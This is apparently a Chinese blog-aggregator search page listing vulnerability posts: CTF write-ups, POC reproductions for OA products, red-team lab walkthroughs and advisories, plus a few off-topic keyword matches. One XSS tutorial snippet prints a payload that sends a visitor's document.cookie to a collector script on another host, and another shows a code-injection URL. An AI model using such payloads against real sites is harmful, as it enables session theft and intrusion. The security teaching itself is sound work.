漏洞信息收集

[SWPUCTF 2021 新生赛]WEB刷题记录

题目说它是一个反序列化的漏洞,常规先用御剑扫描一波,扫到了两个,有一个robots.txt这里我们需要了解robots协议也称爬虫协议、爬虫规则等,是指网站可建立一个robots.txt文件来告诉搜索引擎哪些页面可以抓取
继续学吧·2023-12-26 19:41

关于漏洞,你应该知道这些

2018年伊始,一个关于漏洞的大新闻引起广泛关注。Intel处理器架构存在设计缺陷由此引发了两个漏洞——“Meltdown”与“Spectre”。
baymax哈哈·2023-12-26 18:59

黑客所掌握的“社会工程学”,其破坏力如此巨大

社会工程学是一种黑客攻击手段,区别于攻击传统攻击的计算机漏洞,其针对的主体为人。黑客利用所掌握的人性特点,诱导目标透露信息,开展攻击行为,最终实现自身目的。而人性,是黑客展开攻击的入口。
baymax哈哈·2023-12-26 18:29

大数据网站攻击实时项目架构

随着互联网的流行,网站安全问题就日益突出,但绝大多数的网站开发与建设公司只考虑正常用户的稳定使用,而对于网站安全方面了解甚少,发现网站安全存在问题和漏洞,其修补方式只能停留在页面代码的删除或者是恢复网站备份
play_big_knife·2023-12-26 18:50

文件解析

一、文件解析漏洞使用了低版本的,存在漏洞的web服务器。
CanMeng·2023-12-26 17:28

(2019-12-17周二)儿子正常上课啦(273)

也不怕任何人的说教,就是找出原因,找出自己知识点的漏洞。愿意找老师解决自己的问题,毫不保留,毫不畏惧。虽然说自己当下的心情也不是那样的快乐,但是有一点值得非常肯定。
云庆亲子教育·2023-12-26 17:09

XSS跨站脚本攻击详解

一、简介XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。
Atvl·2023-12-26 17:55

SSRF中Redis的利用

1.SSRF1.1什么是SSRFSSRF(Server-SideRequestForgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统
渗透测试老鸟-九青·2023-12-26 17:51

Nacos身份认证权限绕过+漏洞利用工具分享

一JWTJWT:JSONWebToken(JWT)是一个开放标准(RFC7519),它定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任,因为它是数字签名的。在线解密查看内容:https://jwt.io/JWT的使用场景:1.Authorization(授权):这是使用JWT的最常见场景。一旦用户登录,后续每个请求都将包含JWT,允许用户访问该令
渗透测试老鸟-九青·2023-12-26 17:51

渗透测试 | 信息收集常用方法合集

目录一、关于域名1.子域名收集a.搜索引擎查找b.在线查询c.工具d.SSL/TLS证书查询2.端口型站点收集3.目录文件扫描a.目录扫描工具b.github搜索c.google搜索d.在线网站e.文件接口工具4.旁站和C段a.旁站查询b.C段查询5.网站技术架构信息a.基础知识b.网站头信息6.CMS识别二、关于IP1.CDNa.CDN检测b.CDN绕过2.主机发现a.二层发现b.三层发现c.四
渗透测试老鸟-九青·2023-12-26 17:21

安全漏洞周报(2023.12.04-2023.12.11)

漏洞速览■ ApacheStruts代码执行漏洞(CVE-2023-50164)■ ApacheOFBiz远程代码执行漏洞(CVE-2023-49070)■ SpringFramework
零信任Enlink_Young·2023-12-26 16:05

安全漏洞周报(2023.12.18-2023.12.25)

漏洞速览■ ApacheDubbo多个反序列化漏洞安全■ GoogleChromeWebRTC堆缓冲区溢出漏洞(CVE-2023-7024)■ 金蝶Apusic应用服务器远程代码执行漏洞
零信任Enlink_Young·2023-12-26 16:03

记一次渗透测试信息收集-越权

目录一、信息收集子域名收集存活探测二、越权越权一越权二一、信息收集子域名收集使用subfinder进行子域名收集语法:subfinder.exe-dxx.com-all-oqq1.txt-v//结合自己渗透经验
爱玩游戏的黑客·2023-12-26 16:26

记一次渗透测试信息收集(证书+c段+历史漏洞搜索)

目录一、当资产列表挖掘不出漏洞的时候二、信息收集之证书信息收集(部分方式)三、信息收集之C段信息收集四、信息收集之某网关RCE一、当资产列表挖掘不出漏洞的时候二、信息收集之证书信息收集(部分方式)Fofa
爱玩游戏的黑客·2023-12-26 16:26

记一次渗透测试信息收集(子域名+端口)

目录一、当主站没啥业务功能时二、信息收集之子域名挖掘三、信息收集之端口扫描四、弱口令五、后台SQL注入六、SQL注入之排序注入七、SQL注入之排序注入2八、SQL注入之排序注入—补充碰到个有意思的,记录一下一
爱玩游戏的黑客·2023-12-26 16:24

ADKFP门禁出入口综合安防管理平台aDKManageUser接口未授权访问漏洞复现 [附POC]

文章目录ADKFP门禁出入口综合安防管理平台aDKManageUser接口未授权访问漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造
gaynell·2023-12-26 15:38

九思OA wap.do接口任意文件读取漏洞复现 [附POC]

文章目录九思OAwap.do接口任意文件读取漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现九思OAwap.do接口任意文件读取漏洞复现
gaynell·2023-12-26 15:08

CVE-2023-25717:Ruckus Wireless Admin 命令执行漏洞复现 [附POC]

文章目录RuckusWirelessAdmin命令执行(CVE-2023-25717)漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.
gaynell·2023-12-26 15:07

致远OA任意文件上传

致远OA任意文件上传漏洞简介致远OA是一套办公协同管理软件。
后土轮回台·2023-12-26 15:37

红帆OA iorepsavexml接口任意文件上传漏洞复现 [附POC]

文章目录红帆OAiorepsavexml接口任意文件上传漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现红帆OAiorepsavexml
gaynell·2023-12-26 15:06

跨域怎么解决

这是因为图⽚资源并没有进⾏ajax请求,⽽且script标签是没有同源策略的,可以进⾏资源请求,可以说是⼀个前端设计的漏洞。//1.回调函数functionhandleRe
追涨杀跌的小韭菜·2023-12-26 14:15

Spring漏洞合集

目录什么是spring区分Spring与Struts2框架的几种新方法CVE-2016-4977:SpringSecurityOAuth2远程命令执行漏洞漏洞介绍&环境准备漏洞发现漏洞验证&利用1利用2CVE
lainwith·2023-12-26 13:30

ActiveMQ漏洞合集

目录介绍CVE-2015-5254:ApacheActiveMQ任意代码执行漏洞漏洞介绍&环境准备漏洞发现Nuclei❌Vulmap✅漏洞验证漏洞利用CVE-2016-3088:ApacheActiveMQFileserver
lainwith·2023-12-26 13:30

PHP危险函数总结

这个用法就会产生漏洞,通过一个例子来看一下:输入:http://127.0.0.1/1.php?arg=phpinfo(
lemonl1·2023-12-26 13:51

货币战争读后感

且不说宋鸿兵所著的货币战争是真是假,对于我自己而言,这本书虽然惊世骇俗,但有很多的漏洞。我认为金本位不应该也不可能被复辟,信用货币将会继续存在,且信用货币的发展必须在严格限制下进行。
啾一口甜喔·2023-12-26 13:43

通达OA header身份认证绕过漏洞复现

通达OA是中国通达公司的一套协同办公自动化软件,通达OA2013,通达OA2016,通达OA2017存在身份认证绕过漏洞,攻击者可以利用漏洞生成cookie,实现未授权访问。
fly夏天·2023-12-26 12:57

JumpServer RCE漏洞复现

本文主要复现2021年1月出现的JumpSever的RCE漏洞1.漏洞范围JumpServer
fly夏天·2023-12-26 12:27

Polkit本地权限提升漏洞(CVE-2021-4034)复现

本文主要复现2022年1月出现的Polkit的RCE漏洞1.漏洞影响范围绝大多数版本linux都在本次影响范围中漏洞检测方法:centos:rpm-qa|grep'polkit'ubuntu:dpkg-lpolicykit
fly夏天·2023-12-26 12:27

用友U8CRM系统help2 任意文件读取漏洞复现

用友U8+CRM系统的help2文件中接口存在任意文件读取漏洞,攻击者在未登录情况下即可进行漏洞利用。
fly夏天·2023-12-26 12:27

用友u8-cloud RegisterServlet SQL注入漏洞复现

用友U8cloud是用友推出的企业上云数字化平台,该产品RegisterServlet接口处存在SQL注入漏洞,攻击者可通过该漏洞获取数据库权限。
fly夏天·2023-12-26 12:27

泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)

CNVD-2022-43245泛微e-cologyXmlRpcServlet接口处存在任意文件读取漏洞,攻击者可利用漏洞获取敏感信息。
fly夏天·2023-12-26 12:24

漏洞复现-泛微OA xmlrpcServlet接口任意文件读取漏洞(附漏洞检测脚本)

免责声明文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。
炼金术师诸葛亮·2023-12-26 12:53

momentum2靶机

文章目录文章妙语前言一、信息收集1.IP地址扫描2.端口扫描3.目录扫描二,漏洞发现分析代码bp爆破1.生成字典2.生成恶意shell.php2.抓包三,漏洞利用1.反弹shell四,提权五,总结前言本文记录一个大学生如何辛辛苦苦升级打怪的奇异过程一
郑居中3.0·2023-12-26 11:19

代码质量检查Sonarqube安装及Jenkins自动化集成

通过SonarQube我们可以检测出项目中不规范的代码,重复代码,潜在bug,安全性漏洞,单元测试覆盖率等问题,并通过SonarQubewebUI展示出来;另外可以通过API及插件还可以与自动化工具集成
上岸的魚·2023-12-26 11:51

红队打靶练习:JANGOW: 1.0.1

目录信息收集1、arp探测2、netdiscover3、nmap扫描4、目录扫描WEB1、80端口2、21端口ssh登录1、写入shell2、反弹shell提权Getshell信息收集1、arp探测┌─
真的学不了一点。。。·2023-12-26 10:13

红日靶场-2

目录前言外网渗透外网渗透打点1、arp探测2、nmap探测3、nikto探测4、gobuster目录探测WebLogic10.3.6.01、版本信息2、WeblogicScan扫描3、漏洞利用4、哥斯拉连接内网渗透
真的学不了一点。。。·2023-12-26 10:42

红队打靶练习:DIGITALWORLD.LOCAL: JOY

目录信息收集1、arp2、netdiscover3、nmapWEB80端口web服务漏洞查询漏洞测试enum4linuxftp匿名登陆漏洞ftp复制文件漏洞补充opensslgetroot总结信息收集1
真的学不了一点。。。·2023-12-26 10:42

红队打靶练习:DIGITALWORLD.LOCAL: FALL

目录信息收集1、arp2、netdiscover3、nmap4、nikto5、whatweb6、小结目录探测1、gobuster2、dirsearchWEB80端口/test.php文件包含漏洞SSH登录提权
真的学不了一点。。。·2023-12-26 10:38

OpenSSH升级指南:实战检验的步骤,有效加固服务器安全

在做服务器漏扫时我们经常会遇到有关于OpenSSH相关的安全漏洞,本文主要给大家介绍一下有关于OpenSSH的升级方法,小伙伴们可以参考一下流程,按步骤操作,但是过程中一定会遇到各种各样的问题,需要自行解决
远见阁·2023-12-26 09:09

Windows漏洞利用开发——利用SEH绕过GS保护

实验6Windows漏洞利用开发6.1实验名称Windows漏洞利用开发6.2实验目的学习windows漏洞利用开发,使用kalilinux相关工具对windows内目标程序进行漏洞利用6.3实验步骤及内容第二阶段
Hellespontus·2023-12-26 09:44

Windows漏洞利用开发——利用ROP绕过DEP保护

实验6Windows漏洞利用开发6.1实验名称Windows漏洞利用开发6.2实验目的学习windows漏洞利用开发,使用kalilinux相关工具对windows内目标程序进行漏洞利用6.3实验步骤及内容第三阶段
Hellespontus·2023-12-26 09:44

Windows漏洞利用开发——简单栈溢出

实验6Windows漏洞利用开发6.1实验名称Windows漏洞利用开发6.2实验目的学习windows漏洞利用开发,使用kalilinux相关工具对windows内目标程序进行漏洞利用6.3实验步骤及内容第一阶段
Hellespontus·2023-12-26 09:13

Python安全之编写SQL注入漏洞利用脚本(EXP)

背景:最近护网在一次渗透测试过程发现了一处SQL盲注,在SQLMAP上跑了下居然没跑出结果,原因不明也没过多分析。于是自己写了个简单脚本作为测试。本例中以靶机DVWA中的盲注为例。实际工作中将脚本中的cookie、sql_payload、url以及请求方式修改成你实际环境中的就可以用了。最终执行效果如下:代码比较简单,值得一提的是怎么判断库名所有字符已经结束了,我用的是计数器。计数器num每次遍历
gaojian5422·2023-12-26 09:43

XSS漏洞利用——获取cookie

实验环境:DVWA实验步骤:一、在服务器创建一个1.php文件获取cookie值,并将cookie值写入1.txt中php代码如下:二、构造url,当用户打开url时自动将其本地cookie发送到1.txt中三、将代码和本地cookie进行拼接代码如下:document.location='http://192.168.1.101/xss/1.php?cookie='+document.cooki
没有如果ru果·2023-12-26 09:12

【应急类漏洞】————1、未授权访问漏洞总结

根据之前应急响应的案例分析,以及一些安全报告统计,目前大部分的勒索病毒均利用未授权访问等通用漏洞进行植入、勒索,尤其是Redis、MongoDB等数据库的未授权访问漏洞尤其严重。
FLy_鹏程万里·2023-12-26 09:12

Windows漏洞利用开发——脚本编写与提权

实验6Windows漏洞利用开发6.1实验名称Windows漏洞利用开发6.2实验目的学习windows漏洞利用开发,使用kalilinux相关工具对windows内目标程序进行漏洞利用6.3实验步骤及内容第四阶段
Hellespontus·2023-12-26 09:42

POC-T框架学习————3、编写脚本

/script目录在此目录下新建Python文件poctest.py添加接口函数在代码中添加函数poc()添加逻辑使验证成功(漏洞存在)时returnTrue,验证失败时returnFalse(程序运行时
FLy_鹏程万里·2023-12-26 09:42

渗透笔记 (第一天 )

基础操作系统和渗透名词渗透名词poc概念验证漏洞证明验证exp利用利用系统漏洞进行攻击动作唯一性payload有效载荷在目标系统执行的代码和指令(通道)shellcodeshell代码payload的一种建立正向和反向的名字
学网安的小菜鸡·2023-12-26 08:36

手动漏洞挖掘 phpMyAdmin默认安装

手动漏洞挖掘(一)学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。
冲鸭小慈·2023-12-26 07:29

CNVD原创漏洞审核和处理流程

一、CNVD原创漏洞审核归档和发布主流程(一)审核和归档流程审核流程分为一级、二级、三级审核,其中一级审核主要对提交的漏洞信息完整性进行审核,漏洞符合可验证(通用型漏洞有验证代码信息或多个互联网实例、事件型漏洞有验证过程和相关截图
haosha。·2023-12-26 07:12
上一页 73 74 75 76 77 78 79 80 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他